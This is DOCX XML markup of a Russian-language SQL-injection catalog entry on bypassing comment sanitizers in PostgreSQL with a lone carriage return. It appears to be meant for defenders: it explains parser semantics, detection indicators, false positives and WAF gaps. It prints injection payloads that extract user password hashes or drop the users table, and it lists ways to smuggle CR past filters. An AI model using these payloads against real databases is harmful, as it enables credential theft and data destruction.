        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для атакующего: путать sanitizer-нормализацию (которая видит U+2028 как «логическая newline») с PG-парсером (который видит только ASCII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Включаем Payload B в карточку </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">именно как анти-паттерн</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, чтобы команда DS-workshop знала, что Unicode-line-separator-атака против PG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 в отличие от MySQL/MSSQL, где (по версиям) Unicode-line-terminator-парсинг иногда реализован.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload C — CR+CRLF mix для обхода regex `\r?\n`</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Контекст: sanitizer регекс </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">r"--.*?\r?\n"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — пытается покрыть и LF, и CRLF, но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non-greedy +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опциональный — кладёт первого совпавшего, что часто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Атакующий проталкивает payload с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Этот case — это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload A в другой форме</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Sanitizer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ожидает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обязательно после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Если только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 match не происходит, sanitizer оставляет весь </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">--text\rINJECTED</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> как один блок (для него это всё комментарий до </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">end-of-string</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, не line-end).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload идентичен Payload A; разница только в формулировке слабости sanitizer-а:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">admin'--harmless\rUNION SELECT id,email,password_hash FROM users--</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Что в результате доходит до сервера</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — то же, что и Payload A.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Что произойдёт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A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — CR-only обходит sanitizer-ы, нормализующие к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ищущие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как unit. PG-парсер обрывает комментарий на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активирует injected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B (анти-паттерн)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Unicode-line-separator U+2028/U+2029 —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против PG. Только sanitizer/JSON-парсер их «видит» как line.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C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — вариант Payload A для sanitizer-а с regex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считает `\r` line-terminator-ом независимо от `\n`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — это уникальная семантика парсера. Sanitizer-ы, написанные под общую SQL-семантику (где line-terminator только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отстают.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Python `re.MULTILINE`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> распознаёт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как boundary, не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Это контр-интуитивно.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HTTP/JSON layer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> обычно нормализует line-endings к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Сырой одиночный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редкий, но при byte-уровневой передаче (multipart binary, custom JSON `"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">"`) проходит.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Bytes-level sanitizer-ы</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> на ModSecurity / Imperva иногда обрабатывают только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(0x0A) как line-terminator, игнорируя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(0x0D).</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PG-парсер</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: см. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">src/backend/parser/scan.l</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, scan-state </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">xqs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (single-line-comment) — закрывается на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">[\n\r]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Любой из двух байтов.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Спецификация SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: SQL:2008 §5.2 определяет </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;simple comment terminator&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> как «implementation-defined newline character or sequence». PG имплементирует «any of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Стабильно</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: эта семантика с самой ранней версии PG (фактически — flex-уровень, не PG-специфичная фича).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Сравнение с другими СУБД</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: MySQL обрывает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-комментарий </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">только</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(документация: «to end of line»), MSSQL — на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(но не одиночный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Каждая СУБД имеет свою семантику line-terminator-а, и PG — самая «либеральная».</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7.x – 17</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (все поддерживаемые).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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: PUBLIC. Целевая атака может требовать любые privileges.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Уязвимый sanitizer на client-side / WAF / API-gateway</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, не нормализующий одиночный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Если в pipeline есть нормализация к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строгая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-only validation), Payload A не пройдёт.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Способ передать одиночный `\r` в payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: URL-encoded </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">%0D</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, JSON `"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">"`, raw bytes в multipart upload.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Multi-line SQL в скриптах migration / seed-данных</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между statement-ами. Не атака; стандартный код.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CRLF в text-полях</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: legitimate user-data (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">address: '123 Main St\nCity'</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 это не атака, потому что параметризация (если есть) пакует как text.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CR-only в legacy-Mac-text-полях</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: классические Mac OS (&lt; OS X) использовали одиночный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как line-terminator. Современные системы редко.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Атака отличается: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Одиночный `\r` в `q`-параметре HTTP-запроса</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — крайне редок в legitimate-трафике. Маркер автоматизированного payload-генерации.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`--&lt;short text&gt;\r&lt;UNION|DROP|GRANT&gt;...`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — структура «комментарий-затем-CR-затем-DDL/UNION» — почти всегда атака.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**HTTP/JSON pre-decode `</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">** — explicit Unicode-escape для CR. Legitimate JSON-data редко содержит этот escape (обычно </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">\n` достаточно).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запись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переносом — обычно фиксированный legitimate-комментарий код, не из user-input. User-controlled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-комментарий — индикатор log-injection (см. также 3.12.3 для server-side leak через CRLF-в-identifier).</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7.x – 17</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (все поддерживаемые).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работает идентично.</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3.9.0 (WAF категории 3.9)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — содержит правило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3.12.2 — про обход sanitizer-а </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">после</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> прохода WAF (если WAF пропускает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WAF — это и есть sanitizer, который не учитывает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3.12.1 (Nested block comments)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — параллельный класс. Часто комбинируются: 3.12.1 для block-comment-обхода + 3.12.2 для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обхода.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3.12.3 (Newline в идентификаторах)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — server-side counterpart. 3.12.2 — про client-input CR/LF в payload-тексте; 3.12.3 — про CR/LF, embedded в PG-объектное имя (через </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--\r;DROP TABLE users</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — комбо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после CR; в extended-protocol заблокировано на сервере.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3.9.4 (E-strings hex)</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E'\r'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> встраивает CR в string-литерал; альтернатива для контекстов, где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byte не проходит через encoding-pipeline.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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> регекса для одиночного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--[^\r\n]*\r[^\n]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) нет. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Рекомендация:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> см. сводный regex категории 3.12 в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">summary-3.12.md</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Comments</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — спецификация.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source: src/backend/parser/scan.l (xqs state)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — реализация.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SQL:2008 standard §5.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — общий контекст.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SQL injection — line-terminator bypass</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — общий класс.</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PostgreSQL Injection — comment tricks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — практические payload-ы.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RFC 5424 §6 — Syslog line endings</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
